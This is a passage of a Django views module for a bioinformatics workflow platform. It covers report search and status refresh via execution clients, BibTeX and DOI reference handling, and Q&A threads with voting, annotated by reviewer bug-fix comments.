        # Fixed typos in the user-facing message ("Coud"/"lst"/"efoort")
        return fail(f'Could not find stdout on the last validation effort of tool: {tool_repr}')
    context = {
        # Validation output contains ANSI escape codes; convert them to HTML
        'html': convert_ansi_to_html(tool.last_validation.stdout)
    }
    return render(request, 'app/tool_stdout.html', context)
### END OF CALL BACK ###
### REPORTS
def reports_search_2(main_search, request):
    '''
    Collect all reports that match the main search.
    Unlike the other *_search_2 functions, only reports that belong to the
    logged-in user are shown.
    Returns a dict with the match count and a jstree node list.
    '''
    # Anonymous / non-validated users get no report results at all
    if request.user.is_anonymous or (not user_is_validated(request)):
        return {
            'main_search_reports_number': 0,
            'reports_search_jstree': [],
        }
    obc_user = OBC_user.objects.get(user=request.user)
    # Match on nice id, workflow name, or owner's username
    match_q = (
        Q(nice_id__contains=main_search) |
        Q(workflow__name__icontains=main_search) |
        Q(obc_user__user__username__icontains=main_search)
    )
    # Exclude reports whose only token is still "unused"
    only_unused_q = Q(tokens__status=ReportToken.UNUSED) & Q(num_tokens=1)
    results = Report.objects.annotate(num_tokens=Count('tokens')).filter(
        Q(obc_user=obc_user) & match_q & ~only_unused_q
    )
    # Build the jstree: one node per distinct workflow, reports hang under it
    reports_search_jstree = []
    seen_workflows = set()
    for report in results:
        wf = report.workflow
        if wf not in seen_workflows:
            seen_workflows.add(wf)
            reports_search_jstree.append({
                'data': {'name': wf.name, 'edit': wf.edit, 'type': 'workflow'},
                'text': workflow_text_jstree(wf) + jstree_icon_html('workflows'),
                'id': workflow_id_jstree(wf, g['SEARCH_REPORT_TREE_ID']),
                'parent': workflow_id_jstree(wf.forked_from, g['SEARCH_REPORT_TREE_ID']) if wf.forked_from else '#',
                'state': {'opened': True},
            })
        # The report node itself, parented under its workflow
        reports_search_jstree.append({
            'data': {'run': report.nice_id, 'type': 'report'},
            'text': report.nice_id + jstree_icon_html('reports'),
            'id': report_id_jstree(report, g['SEARCH_REPORT_TREE_ID']),
            'parent': workflow_id_jstree(wf, g['SEARCH_REPORT_TREE_ID']),
            'state': {'opened': True},
        })
    return {
        'main_search_reports_number': results.count(),
        'reports_search_jstree': reports_search_jstree,
    }
@has_data
def reports_search_3(request, **kwargs):
    '''
    Search for an individual report (by its nice id) and return its details.
    Only the owner of the report may see it.
    '''
    if request.user.is_anonymous or (not user_is_validated(request)):
        return fail('You are either anonymous or your email is not validated. You do not have access to reports.')
    obc_user = OBC_user.objects.get(user=request.user)
    run = kwargs['run']
    try:
        report = Report.objects.get(nice_id=run, obc_user=obc_user)
    except ObjectDoesNotExist:
        return fail('Could not find report, or you do not have access.')
    workflow = report.workflow
    # Collect all tokens except the unused ones, oldest first
    tokens = []
    for token in report.tokens.all().order_by('created_at'):
        if token.status == ReportToken.UNUSED:
            continue
        tokens.append({
            'status': token.status,
            'created_at': datetime_to_str(token.created_at),
            'token': str(token.token),
            # Parameters passed to nodeAnimation_public on the client
            'node_anim_params': ReportToken.parse_response_status(token.status),
        })
    # Sanity check: parse_response_status must have succeeded for every token
    for token in tokens:
        if token['node_anim_params'] is None:
            return fail('Error 8915: could not parse token: {}'.format(token['status']))
    ret = {
        'report_workflow_name': workflow.name,
        'report_workflow_edit': workflow.edit,
        'report_username': report.obc_user.user.username,
        'report_created_at': datetime_to_str(report.created_at),
        'report_tokens': tokens,
        'report_client': bool(report.client),
        'report_url': report.url,  # The url with the results
        'report_log_url': report.log_url,  # The url with the logs
        'report_visualization_url': report.visualization_url,  # The url for monitoring the execution progress (i.e. from airflow)
        'report_monitor_url': report.monitor_url,
        'report_client_status': report.client_status,
        'workflow': simplejson.loads(workflow.workflow),
    }
    return success(ret)
@has_data
def reports_refresh(request, **kwargs):
    '''
    path: report_refresh/
    Get an update for a report from its execution client.
    report_workflow_action : 1 = refresh , 2 = pause , 3 = resume , 4 = delete/abort
    Returns the (possibly new) client status and, on success/failure,
    the URLs where the results and logs can be downloaded.
    '''
    report_workflow_name = kwargs['report_workflow_name']  # NOTE(review): not used below
    report_workflow_edit = int(kwargs['report_workflow_edit'])  # NOTE(review): not used below
    nice_id = kwargs['report_workflow_run']
    report_workflow_action = kwargs['report_workflow_action']
    # Get the report
    report = Report.objects.get(nice_id=nice_id)
    previous_status = report.client_status  # NOTE(review): never read afterwards
    if request.user.is_anonymous:
        return fail('Please log in to update the status of a Report')
    # Get this user. Only the owner of a report may act on it.
    obc_user = OBC_user.objects.get(user=request.user)
    if obc_user != report.obc_user:
        return fail('Cannot edit a report of another user.')
    if not report.client:
        if report_workflow_action == 4:
            # Deleting a report that has not been associated with any client.
            # Just delete it..
            report.delete()
            return success()
        # NOTE(review): any other action on a client-less report hits the
        # attribute access below with report.client unset — confirm the
        # frontend only ever sends action 4 for such reports.
    # Get the url of the client
    client_url = report.client.client
    if report_workflow_action == 1:
        # Refresh: ask the client for the current status of the run
        url = g['create_client_check_status_url'](client_url, nice_id)
    elif report_workflow_action == 2:
        # Pause
        url = g['create_client_pause_url'](client_url, nice_id)
    elif report_workflow_action == 3:
        # Resume
        url = g['create_client_resume_url'](client_url, nice_id)
    elif report_workflow_action == 4:
        # Delete: abort the run on the client first
        url = g['create_client_abort_url'](client_url, nice_id)
    else:
        return fail('Error 5821: {}'.format(str(report_workflow_action)))
    try:
        r = requests.get(url)
    except requests.exceptions.ConnectionError as e:
        return fail('Could not establish a connection with client')
    if not r.ok:
        return fail('Could not send to URL: {} . Error code: {}'.format(client_url, r.status_code))
    data_from_client = r.json()
    # Example error payload from the client: {"error": "Dag id mitsos not found"}
    if report_workflow_action == 1: # refresh
        # A dict response is an error message; the expected success shape is
        # a single-element list of dicts with a 'state' key.
        if type(data_from_client) is dict:
            if 'error' in data_from_client:
                if 'not found' in data_from_client['error']:
                    status = 'NOT FOUND'
                    # NOTE(review): execution falls through to the list-type
                    # check below, which fails with 'Error: 1113' for dicts,
                    # so this 'NOT FOUND' status appears unreachable — confirm.
                else:
                    return fail('Error: 1111')
            else:
                return fail('Error: 1112')
        if not type(data_from_client) is list:
            return fail('Error: 1113')
        if len(data_from_client) != 1:
            return fail('Error: 1114')
        if not type(data_from_client[0]) is dict:
            return fail('Error: 1115')
        if not 'state' in data_from_client[0]:
            return fail('Error: 1116')
        # Map the client's state string to our report status constants
        if data_from_client[0]['state'] == 'running':
            status = 'RUNNING'
        elif data_from_client[0]['state'] == 'failed':
            status = 'FAILED'
        elif data_from_client[0]['state'] == 'success':
            status = 'SUCCESS'
        elif data_from_client[0]['state'] == 'paused':
            status = 'PAUSED'
        else:
            # NOTE(review): fail() is called with two arguments only here,
            # unlike everywhere else in this file — confirm fail() accepts this.
            return fail('Unknown status:', data_from_client[0]['state'])
    elif report_workflow_action in [2, 3]: # 2 = pause , 3 = resume
        # Pause/resume responses: {'response': 'ok'}
        if not type(data_from_client) is dict:
            return fail('Error: 1119')
        if not 'response' in data_from_client:
            return fail('Error: 1120')
        if data_from_client['response'] != 'ok':
            return fail('Error 1121')
        if report_workflow_action == 2:
            status = 'PAUSE_SUBMITTED'
        elif report_workflow_action == 3:
            status = 'RESUME_SUBMITTED'
        else:
            return fail('Error 1122')
    elif report_workflow_action == 4:
        # Abort responses: {'status': 'success'}
        if not type(data_from_client) is dict:
            return fail('Error: 1123')
        if not 'status' in data_from_client:
            return fail('Error 1124')
        if data_from_client['status'] != 'success':
            return fail('Client responded with an error message: {}'.format(data_from_client['status']))
        # The client aborted the run. Delete it..
        report.delete()
        return success()
    # Update report object
    report.client_status = status
    report.save()
    # If we finished, then create the URL that contains the report
    report_url = None
    log_url = None
    if status == 'SUCCESS':
        report_url = g['create_client_download_report_url'](client_url, nice_id)
    if status in ['SUCCESS', 'FAILED']:
        log_url = g['create_client_download_log_url'](client_url, nice_id)
    report.url = report_url
    report.log_url = log_url
    report.save()
    ret = {
        'report_url': report_url,
        'report_log_url': log_url,
        'report_client_status': status,
    }
    return success(ret)
### END OF REPORTS
### REFERENCES
def bibtex_to_html(content):
    '''
    Convert a BIBTEX string to HTML.
    Adapted from: http://pybtex-docutils.readthedocs.io/en/latest/quickstart.html#overview
    Returns a (success, html_or_error_message, fields) tuple, where fields
    maps the entry key to a dict of its bibtex field key/value pairs.
    '''
    # Ideally these would be created only once, but pybtex does not allow
    # reusing them across multiple entries.
    pybtex_style = pybtex.plugin.find_plugin('pybtex.style.formatting', 'plain')()
    pybtex_html_backend = pybtex.plugin.find_plugin('pybtex.backends', 'html')()
    pybtex_parser = pybtex.database.input.bibtex.Parser()
    try:
        data = pybtex_parser.parse_stream(six.StringIO(content))
    except pybtex.scanner.TokenRequired as e:
        return False, 'Error during parsing BIBTEX: ' + str(e), None
    # Exactly one entry is required
    if len(data.entries) == 0:
        return False, 'Could not find any BIBTEX entry', None
    if len(data.entries) > 1:
        return False, 'Detected more than one entries in BIBTEX. Only one is allowed', None
    # Copy the parsed fields into plain dicts
    fields = {
        entry_key: {field_key: field_value for field_key, field_value in entry_value.fields.items()}
        for entry_key, entry_value in data.entries.items()
    }
    data_formatted = pybtex_style.format_entries(six.itervalues(data.entries))
    output = io.StringIO()
    try:
        pybtex_html_backend.write_to_stream(data_formatted, output)
    except pybtex.style.template.FieldIsMissing as e:
        # e.g. DOI 10.1038/nature09298 : missing author in 2010.
        return False, str(e), None
    # Keep only the body lines of the generated page and drop the <dd> tags
    html_lines = output.getvalue().split('\n')[9:-2]
    new_html = '\n'.join(html_lines).replace('<dd>', '').replace('</dd>', '')
    return True, new_html, fields
def get_fields_from_bibtex_fields(fields, str_response):
    '''
    Build a references dictionary from parsed bibtex fields.

    fields maps the bibtex entry key (e.g. 'Barrangou_2007') to a dict of
    that entry's field key/value pairs; str_response is the already
    formatted HTML representation of the reference.
    '''
    name = next(iter(fields))  # first (and only) entry key
    entry = fields[name]
    # Strip the brackets bibtex uses to protect capitalization: {Title}
    title = entry.get('title', '').replace('{', '').replace('}', '')
    # doi/url keys may appear in either lower or upper case
    doi = entry.get('doi', '') or entry.get('DOI', '')
    url = entry.get('url', '') or entry.get('URL', '')
    return {
        'references_name': name,
        'references_formatted': str_response,
        'references_title': title,
        'references_doi': doi,
        'references_url': url,
    }
@has_data
def references_generate(request, **kwargs):
    '''
    Generate an HTML reference from bibtex.
    '''
    suc, str_response, fields = bibtex_to_html(kwargs['references_BIBTEX'])
    if not suc:
        # str_response holds the parse error message
        return fail(str_response)
    return success(get_fields_from_bibtex_fields(fields, str_response))
@has_data
def references_process_doi(request, **kwargs):
    '''
    Generate a BIBTEX entry (and its parsed fields) from a DOI.
    '''
    references_doi = kwargs.get('references_doi', '')
    if not references_doi:
        return fail('DOI is empty')
    # A DOI is considered valid when it forms a valid dx.doi.org URL
    doi_url = "http://dx.doi.org/" + references_doi
    if not valid_url(doi_url):
        return fail('Invalid DOI. Example of valid DOI: 10.1126/science.1138140')
    bibtex = resolve_doi(references_doi)
    if not bibtex:
        return fail('Could not get bibliographic information for this DOI')
    suc, str_response, fields = bibtex_to_html(bibtex)
    if not suc:
        # This should never happen: the resolver returned malformed BIBTEX
        return fail('The BIBTEX returned from this doi was invalid: ' + str_response)
    ret = get_fields_from_bibtex_fields(fields, str_response)
    ret['references_BIBTEX'] = bibtex
    return success(ret)
@has_data
def references_add(request, **kwargs):
    '''
    Add a new reference.
    Validates name/title/url, enforces uniqueness on url, name and DOI,
    optionally parses a BIBTEX entry, and creates the Reference object.
    '''
    # Check user
    if request.user.is_anonymous:
        return fail('Please login to create References')
    # Check if user is validated
    if not user_is_validated(request):
        return fail('Please validate your email to create new references ' + validate_toast_button());
    references_name = kwargs.get('references_name', '')
    if not references_name:
        return fail('References Name is required')
    if not re.match(r'\w+', references_name):
        return fail('Invalid Reference Name. It should contain only letters and numbers')
    references_title = kwargs.get('references_title', '')
    if not references_title:
        return fail('References Title is required')
    references_url = kwargs.get('references_url', '')
    if not references_url:
        return fail('References URL is required')
    # Is there a reference with the same url?
    url_ref = Reference.objects.filter(url=references_url)
    if url_ref.exists():
        return fail('A Reference with this URL already exists: {}'.format(url_ref.first().name))
    # References are case insensitive!
    references_name = references_name.lower()
    # Are there any references with this name?
    if Reference.objects.filter(name=references_name).exists():
        return fail('A Reference with this name already exists')
    # Is there a reference with the same DOI?
    references_doi = kwargs.get('references_doi', None)
    if references_doi:
        doi_ref = Reference.objects.filter(doi=references_doi)
        if doi_ref.exists():
            return fail('A Reference with this DOI already exists: {}'.format(doi_ref.first().name))
    # Check bibtex. BIBTEX is optional; when present it must parse cleanly.
    references_BIBTEX = kwargs.get('references_BIBTEX', '')
    reference_fields = []
    html = None
    if references_BIBTEX:
        suc, str_response, fields = bibtex_to_html(references_BIBTEX)
        if not suc:
            return fail(str_response)
        # It succeeded to parse BIBTEX. Get the html
        html = str_response
        name = list(fields.keys())[0] # first key
        # Create (or get) a ReferenceField for each bibtex key/value pair
        reference_fields = [ReferenceField.objects.get_or_create(
            key=reference_key,
            value=reference_value,
        )[0] for reference_key, reference_value in fields[name].items()]
    # Create Reference object
    reference = Reference(
        obc_user = OBC_user.objects.get(user=request.user),
        name = references_name,
        url = references_url,
        title = references_title,
        doi = references_doi,
        bibtex = references_BIBTEX if references_BIBTEX else None,
        html = html,
        notes = kwargs.get('references_notes', None),
    )
    reference.save()
    # Add fields from BIBTEX (many-to-many: requires a saved object)
    reference.fields.add(*reference_fields)
    reference.save()
    ret = {
        'references_formatted': html,
        'references_created_at': datetime_to_str(reference.created_at),
        'references_username': request.user.username,
    }
    return success(ret)
def references_search_2(
        main_search,
        ):
    '''
    Collect all references that match the main search.
    Matches on name, rendered html, or owner's username.
    '''
    results = Reference.objects.filter(
        Q(name__icontains=main_search) |
        Q(html__icontains=main_search) |
        Q(obc_user__user__username__icontains=main_search)
    )
    # One flat jstree node per matching reference
    references_search_jstree = [
        {
            'data': {'name': result.name},
            'text': result.name + jstree_icon_html('references'),
            'id': result.name,
            'parent': '#',
            'state': {'opened': True},
        }
        for result in results
    ]
    return {
        'main_search_references_number': results.count(),
        'references_search_jstree': references_search_jstree,
    }
def qa_get_root_comment(comment):
    '''
    Walk up a nested comment thread and return its root comment
    (the one that has no parent).
    '''
    while comment.parent:
        comment = comment.parent
    return comment
def qa_search_2(main_search):
    '''
    Collect all Q&A threads that match the main search.
    Matches on title, comment text, or owner's username; matching replies
    are collapsed to their root question.
    '''
    results = Comment.objects.filter(
        Q(title__icontains=main_search) |
        Q(comment__icontains=main_search) |
        Q(obc_user__user__username__icontains=main_search)
    )
    qa_search_tree = []
    seen_roots = set()
    for result in results:
        # A match can be a reply: get the root message of its thread
        root = qa_get_root_comment(result)
        # Each thread appears only once in the tree
        if root.pk in seen_roots:
            continue
        seen_roots.add(root.pk)
        # Remove <a></a> hyperlinks from question titles (see issue #106)
        m = re.search(r'<a.*a>', root.title)
        if m:
            link_html = m.group(0)
            link_text = re.search(r'>(.*)</a>', link_html).group(1)
            root.title = root.title.replace(link_html, link_text)
        qa_search_tree.append({
            'data': {'id': root.pk},
            'text': root.title + jstree_icon_html('qas'),
            'id': str(root.pk),
            'parent': '#',
            'state': {'opened': True},
        })
    return {
        'main_search_qa_number': len(qa_search_tree),
        'qa_search_jstree': qa_search_tree,
    }
@has_data
def references_search_3(request, **kwargs):
    '''
    Fetch the details of a single reference by name (case-insensitive).
    '''
    name = kwargs.get('name', '')
    try:
        reference = Reference.objects.get(name__iexact=name)
    except ObjectDoesNotExist:
        return fail('Could not find Reference') # This should never happen..
    return success({
        'references_name': reference.name,
        'references_title': reference.title,
        'references_url': reference.url,
        'references_doi': reference.doi,
        'references_notes': reference.notes,
        'references_BIBTEX': reference.bibtex,
        'references_html': reference.html,
        'references_created_at': datetime_to_str(reference.created_at),
        'references_username': reference.obc_user.user.username,
    })
### END OF REFERENCES
### SEARCH
@has_data
def all_search_2(request, **kwargs):
    '''
    Called when there is a key change in main search.
    Splits the search term on '/' to decide which name/version/edit
    filters to apply to tools and workflows, then merges the results of
    all the per-category *_search_2 helpers.
    '''
    main_search = kwargs.get('main_search', '')
    parts = [p.strip() for p in main_search.split('/')]
    slash_count = len(parts) - 1
    if slash_count == 0:
        # No slash: search tools and workflows by name only (unstripped)
        tools_search_name = main_search
        tools_search_version = ''
        tools_search_edit = ''
        workflows_search_name = main_search
        workflows_search_edit = ''
    elif slash_count == 1:
        # name/version for tools, name/edit for workflows
        tools_search_name, tools_search_version = parts
        tools_search_edit = 0  # Do not apply search on tool edit
        workflows_search_name = parts[0]
        try:
            workflows_search_edit = int(parts[1])
        except ValueError:
            workflows_search_edit = 0  # do not apply search on workflow edit
    elif slash_count == 2:
        # name/version/edit: practically applies only to tools
        tools_search_name = parts[0]
        tools_search_version = parts[1]
        try:
            tools_search_edit = int(parts[2])
        except ValueError:
            tools_search_edit = 0  # Do not apply search on tool edit
        workflows_search_name = ''
        workflows_search_edit = -1
    else:
        # Too many slashes: nothing can match
        tools_search_name = ''
        tools_search_version = ''
        tools_search_edit = -1
        workflows_search_name = ''
        workflows_search_edit = -1
    ret = {}
    # Get tools
    ret.update(tools_search_2(tools_search_name, tools_search_version, tools_search_edit))
    # Get workflows
    ret.update(workflows_search_2(workflows_search_name, workflows_search_edit))
    # Get reports
    ret.update(reports_search_2(main_search, request))
    # Get references
    ret.update(references_search_2(main_search))
    # Get users
    ret.update(users_search_2(main_search))
    # Get QAs
    ret.update(qa_search_2(main_search))
    return success(ret)
### END OF SEARCH
### Q&A
@has_data
def qa_add_1(request, **kwargs):
    '''
    Create a new root Q&A question. Called from qa_add_1/
    '''
    qa_title = kwargs.get('qa_title', '')
    if not qa_title:
        return fail('Title should not be empty')
    qa_comment = kwargs.get('qa_comment', '')
    if not qa_comment:
        return fail('Comment should not be empty')
    qa_comment_html = markdown(qa_comment)
    if request.user.is_anonymous:
        return fail('Please login to post a new question')
    # Question titles are unique (case-insensitive)
    if Comment.objects.filter(title__iexact=qa_title).exists():
        return fail('A comment with this title already exists!')
    # Create the root comment of the new thread
    comment = Comment(
        obc_user=OBC_user.objects.get(user=request.user),
        comment=qa_comment,
        comment_html=qa_comment_html,
        title=qa_title,
        parent=None,
        upvotes=0,
        downvotes=0,
    )
    comment.save()
    return success({
        'id': comment.pk,
        'comment_html': qa_comment_html,
    })
def qa_create_thread(comment, obc_user=None):
    '''
    Recursively build the reply thread of a comment as a list of dicts,
    one per direct child, each carrying its own nested 'children' list.
    '''
    return [
        {
            'comment': child.comment,
            'comment_html': child.comment_html,
            'opinion': child.opinion,
            'score': child.upvotes - child.downvotes,
            'id': child.pk,
            'replying': False,
            'voted': is_comment_updownvoted(obc_user, child),
            'children': qa_create_thread(child, obc_user),  # recurse
            'username': child.obc_user.user.username,
            'created_at': datetime_to_str(child.created_at),
        }
        for child in comment.children.all()
    ]
@has_data
def qa_search_3(request, **kwargs):
    '''
    path: qa_search_3/
    From angular: fetch the data of a single Q&A thread and update the UI.
    '''
    id_ = kwargs.get('qa_id', None)
    if not id_:
        return fail('Could not find Q&A id')
    try:
        comment = Comment.objects.get(pk=id_)
    except ObjectDoesNotExist:
        return fail('Could not find comment database object')
    # The viewer (if logged in) is needed to mark their own votes
    obc_user = None if request.user.is_anonymous else OBC_user.objects.get(user=request.user)
    return success({
        'qa_title': comment.title,
        'qa_comment': comment.comment,
        'qa_comment_html': comment.comment_html,
        'qa_score': comment.upvotes - comment.downvotes,
        'qa_id': comment.pk,
        'qa_thread': qa_create_thread(comment, obc_user),
        'qa_voted': is_comment_updownvoted(obc_user, comment),
        'qa_username': comment.obc_user.user.username,
        'qa_created_at': datetime_to_str(comment.created_at),
    })
@has_data
def get_pk_from_root_comment(request, **kwargs):
    '''
    path: get_pk_from_root_comment/
    Map the root comment of a Q&A thread back to the primary key of the
    Tool or Workflow it is attached to.
    '''
    comment_id = int(kwargs['comment_id'])
    pk_type = kwargs['type']
    if pk_type == 'tool':
        obj = Tool.objects.filter(comment_id=comment_id).first()
    elif pk_type == 'workflow':
        obj = Workflow.objects.filter(comment_id=comment_id).first()
    else:
        return fail('ERROR: 2919 . Unknown pk_type: {}'.format(pk_type))
    # BUGFIX: QuerySet.first() returns None when nothing matches — it never
    # raises ObjectDoesNotExist, so the original try/except could not catch
    # a missing object and crashed with AttributeError on .id instead.
    if obj is None:
        return fail('Could not find tool or workflow database object')
    ret = {
        'pk': obj.id,
    }
    return success(ret)
@has_data
def gen_qa_search_3(request, **kwargs):
    '''
    PATH: gen_qa_search_3/
    Generic version of qa_search_3: get the Q&A thread attached to a
    tool or a workflow.
    '''
    object_pk = kwargs['object_pk']  # primary key of the tool/workflow
    qa_type = kwargs['qa_type']
    if qa_type == 'tool':
        commentable = Tool.objects.get(pk=object_pk)
    elif qa_type == 'workflow':
        commentable = Workflow.objects.get(pk=object_pk)
    else:
        return fail('ERROR: 2918 . Unknown qa_type: {}'.format(qa_type))
    # The viewer (if logged in) is needed to mark their own votes
    obc_user = None if request.user.is_anonymous else OBC_user.objects.get(user=request.user)
    # Get the thread hanging off the RO's root comment
    root = commentable.comment
    return success({
        'qa_id': root.pk,
        'qa_thread': qa_create_thread(root, obc_user),
        'qa_voted': is_comment_updownvoted(obc_user, root),
        'qa_score': root.upvotes - root.downvotes,
        'qa_username': root.obc_user.user.username,
        'qa_created_at': datetime_to_str(root.created_at),
    })
@has_data
def qa_add_comment(request, **kwargs):
    '''
    Add a reply to a Q&A question.
    '''
    if request.user.is_anonymous:
        return fail('Please login to add a new comment')
    if not user_is_validated(request):
        return fail('Please validate your email to add a new comment' + validate_toast_button())
    id_ = kwargs.get('qa_id', None)
    if id_ is None:
        return fail('Could not find Q&A id')
    current_comment = kwargs.get('qa_comment', None)
    if current_comment is None:
        return fail('Could not find Q&A new comment')
    if not current_comment.strip():
        return fail('Comment cannot be empty')
    current_comment_html = markdown(current_comment)
    # A reply carries an opinion tag shown next to it in the UI
    opinion = kwargs.get('qa_opinion', None)
    if opinion not in ['solution', 'note', 'agree', 'disagree']:
        return fail('Error 9177. opinion value unknown')
    try:
        parent_comment = Comment.objects.get(pk=id_)
    except ObjectDoesNotExist:
        return fail('ERROR: 8991. Could not find comment database object')
    new_comment = Comment(
        obc_user=OBC_user.objects.get(user=request.user),
        comment=current_comment,
        comment_html=current_comment_html,
        opinion=opinion,
        parent=parent_comment,
        upvotes=0,
        downvotes=0,
    )
    new_comment.save()
    # Link the reply under its parent
    parent_comment.children.add(new_comment)
    parent_comment.save()
    return success({
        'comment_html': current_comment_html,
    })
@has_data
def gen_qa_add_comment(request, **kwargs):
    '''
    PATH: gen_qa_add_comment/
    Generic version of qa_add_comment: add a reply to the Q&A thread of
    a tool or a workflow.
    '''
    if request.user.is_anonymous:
        return fail('Please login to add a new comment')
    if not user_is_validated(request):
        return fail('Please validate your email to add a new comment ' + validate_toast_button())
    comment_pk = kwargs['comment_pk']
    object_pk = kwargs['object_pk']
    qa_comment = kwargs['qa_comment']
    qa_opinion = kwargs['qa_opinion']
    qa_type = kwargs['qa_type']
    current_comment_html = markdown(qa_comment)
    # Locate the tool/workflow the comment belongs to
    if qa_type == 'tool':
        commentable = Tool.objects.get(pk=object_pk)
    elif qa_type == 'workflow':
        commentable = Workflow.objects.get(pk=object_pk)
    else:
        return fail('ERROR: 2918 . Unknown qa_type: {}'.format(qa_type))
    # Reply either to the RO's root comment, or to an explicit comment
    if comment_pk is None:
        root_comment = commentable.comment
    else:
        root_comment = Comment.objects.get(pk=comment_pk)
    new_comment = Comment(
        obc_user=OBC_user.objects.get(user=request.user),
        comment=qa_comment,
        opinion=qa_opinion,
        comment_html=current_comment_html,
        parent=root_comment,
        upvotes=0,
        downvotes=0,
    )
    new_comment.save()
    # Link the reply under its parent
    root_comment.children.add(new_comment)
    root_comment.save()
    return success({
        'comment_html': current_comment_html,
    })
def is_comment_updownvoted(obc_user, comment):
    '''
    Return whether this user has upvoted or downvoted this comment,
    as a {'up': bool, 'down': bool} dictionary.
    '''
    no_vote = {'up': False, 'down': False}
    # Anonymous viewers never have a vote
    if obc_user is None:
        return no_vote
    try:
        vote = UpDownCommentVote.objects.get(obc_user=obc_user, comment=comment)
    except ObjectDoesNotExist:
        return no_vote
    # A vote row is either an upvote or a downvote, never both
    return {'up': vote.upvote, 'down': not vote.upvote}
@has_data
def updownvote_comment(request, **kwargs):
    '''
    url: updownvote_comment/
    Upvote or downvote a Q&A comment.
    Voting in the opposite direction of an existing vote cancels it
    (the comment ends up neither up- nor down-voted by this user).
    '''
    if request.user.is_anonymous:
        return fail('Please login to upvote/downvote comments')
    if not user_is_validated(request):
        return fail('Please validate your email to upvote/downvote' + validate_toast_button());
    comment_id = int(kwargs['comment_id'])
    upvote = kwargs['upvote']
    assert upvote in [True, False]
    # Get the comment
    comment = Comment.objects.get(pk=comment_id)
    # Get the user
    obc_user = OBC_user.objects.get(user=request.user)
    # Check if there is already a vote of this user on this comment
    try:
        vote = UpDownCommentVote.objects.get(obc_user=obc_user, comment=comment)
    except ObjectDoesNotExist:
        # First vote of this user on this comment: create it and count it
        vote = UpDownCommentVote(
            obc_user=obc_user,
            comment=comment,
            upvote=upvote,
        )
        vote.save()
        voted = {'up': upvote, 'down': not upvote}
        if upvote:
            comment.upvotes += 1
        else:
            comment.downvotes += 1
    else:
        # A vote for this comment already exists
        if vote.upvote and upvote:
            # You cannot upvote twice!
            return fail('Already upvoted')
        if (not vote.upvote) and (not upvote):
            # You cannot downvote twice!
            return fail('Already downvoted')
        # The user voted in the opposite direction: cancel the old vote.
        # BUGFIX: the original code deleted the vote but then *incremented*
        # the opposite counter, permanently inflating both upvotes and
        # downvotes on every switch. Decrement the cancelled vote's counter
        # instead, as updownvote_tool_workflow already does. The reported
        # score is the same either way.
        if vote.upvote:
            comment.upvotes -= 1
        else:
            comment.downvotes -= 1
        vote.delete()
        voted = {'up': False, 'down': False}  # Neither upvoted nor downvoted
    comment.save()
    ret = {
        'score': comment.upvotes - comment.downvotes,
        'voted': voted
    }
    return success(ret)
@has_data
def updownvote_tool_workflow(request, **kwargs):
    '''
    Called from $scope.updownvote_tool_workflow
    Called when a user hits the upvote or downvote button of a tool or of a workflow.
    Voting in the opposite direction of an existing vote cancels that vote.
    '''
    if request.user.is_anonymous:
        return fail('Please login to upvote/downvote Research Objects')
    if not user_is_validated(request):
        return fail('Please validate your email to upvote/downvote' + validate_toast_button());
    # Get the user
    obc_user = OBC_user.objects.get(user=request.user)
    ro = kwargs.get('ro', '')  # research-object kind: 'tool' or 'workflow'
    if not ro:
        return fail('Error 1023')
    if not ro in ['tool', 'workflow']:
        return fail('Error 1026')
    ro_obj = kwargs.get('ro_obj', '')  # lookup kwargs identifying the RO
    if not ro_obj:
        return fail('Error 1024')
    upvote = kwargs.get('upvote', '')
    if upvote == '':
        return fail('Error 1025')
    if not upvote in [True, False]:
        return fail('Error 1027')
    # Map the RO kind to its model and to its up/down-vote model
    ro_table = {
        'tool': Tool,
        'workflow': Workflow,
    }[ro]
    ro_ud_table = {
        'tool': UpDownToolVote,
        'workflow': UpDownWorkflowVote,
    }[ro]
    try:
        ro_table_obj = ro_table.objects.get(**ro_obj)
    except ObjectDoesNotExist as e:
        return fail('Error 1027')
    # Check if this user has already upvoted or downvoted this RO
    try:
        ro_ud_table_obj = ro_ud_table.objects.get(**{
            'obc_user': obc_user,
            ro: ro_table_obj,
        })
    except ObjectDoesNotExist as e:
        # This user has **not** upvoted or downvoted this RO
        pass
    else:
        # This user has upvoted or downvoted this RO in the past
        if ro_ud_table_obj.upvote and upvote:
            return fail('You cannot upvote twice')
        elif (not ro_ud_table_obj.upvote) and (not upvote):
            return fail('You cannot downvote twice')
        elif ro_ud_table_obj.upvote and (not upvote):
            # Had upvoted, now downvotes: delete the old vote and undo its effect
            ro_ud_table_obj.delete()
            # Update votes
            ro_table_obj.upvotes -= 1
            ro_table_obj.save()
            return success({
                'score': ro_table_obj.upvotes-ro_table_obj.downvotes,
                'voted': {'up': False, 'down': False},
            })
        elif (not ro_ud_table_obj.upvote) and upvote:
            # Had downvoted, now upvotes: delete the old vote and undo its effect
            ro_ud_table_obj.delete()
            ro_table_obj.downvotes -= 1
            ro_table_obj.save()
            return success({
                'score': ro_table_obj.upvotes-ro_table_obj.downvotes,
                'voted': {'up': False, 'down': False},
            })
    # This user has not upvoted or downvoted before this RO
    # Create a new vote database object
    new_vote_obj = ro_ud_table(**{
        'obc_user': obc_user,
        ro: ro_table_obj,
        'upvote': upvote,
    })
    new_vote_obj.save()
    # Change the upvote / downvote counter of this research object
    if upvote:
        ro_table_obj.upvotes += 1
    else:
        ro_table_obj.downvotes += 1
    ro_table_obj.save()
    ret = {
        'score': ro_table_obj.upvotes-ro_table_obj.downvotes,
        'voted': {'up': upvote, 'down': not upvote},
    }
    return success(ret)
@has_data
def markdown_preview(request, **kwargs):
    '''
    Render a markdown snippet to HTML (used for live previews).
    '''
    text = kwargs.get('text', '')
    # Exact type check on purpose: anything other than a plain str is rejected
    if type(text) is not str:
        return fail('Error 2871')
    return success({
        'html': markdown(text),
    })
@has_data
def edit_comment(request, **kwargs):
    '''
    url: edit_comment/
    Edit the text of a Q&A comment, or the title of a root comment.
    Only the author of the comment may edit it.
    '''
    if request.user.is_anonymous:
        return fail('Please login to upvote/downvote comments')
    if not user_is_validated(request):
        return fail('Please validate your email to edit the comment.' + validate_toast_button());
    comment_id = int(kwargs['comment_id'])
    new_html = kwargs['new_html']
    is_root = kwargs['is_root']
    comment_type = kwargs.get('comment_type')
    # Get the comment
    comment = Comment.objects.get(pk=comment_id)
    # Get the user
    obc_user = OBC_user.objects.get(user=request.user)
    # Only the author may edit
    if comment.obc_user.id != obc_user.id:
        return fail("You don't have the permission to edit this comment!")
    if not is_root:
        # NOTE(review): this looks inverted relative to qa_add_comment, where
        # .comment holds the markdown source and .comment_html the rendered
        # HTML. Here the markdown() output goes into .comment and the raw
